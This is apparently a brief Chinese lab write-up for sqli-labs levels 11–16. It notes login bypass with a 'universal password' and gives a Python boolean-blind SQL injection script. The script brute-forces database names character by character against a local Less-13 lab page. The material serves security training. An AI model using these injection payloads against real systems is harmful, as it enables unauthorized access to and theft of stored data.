11-16关是post请求
11,12 关用 万能密码既可以解决。拿到所有数据。
13-16 关用盲注即可。只是闭合方式不同。没什么新的知识点,直接上脚本
import requests
flag=" \~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#\"!"
result=''
for i in range(100):
for j in range(len(flag)):
Mypayload={"uname":f"1') or 1=1 and if(ord(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))=ord('{flag[j]}'),1,0) #","passwd":"1","submit":"Submit"}
contents=requests.request('post','http://192.168.43.231/sqli-labs/Less-13/',data=Mypayload)
if 'flag.jpg' in contents.text:
result+=flag[j]
print("database_name:"+result)
这几关的闭合方式都是常规套路,因为懒就不一一呈现了。大家可以自己去试试。或者看其他师傅的博客。都很详细的。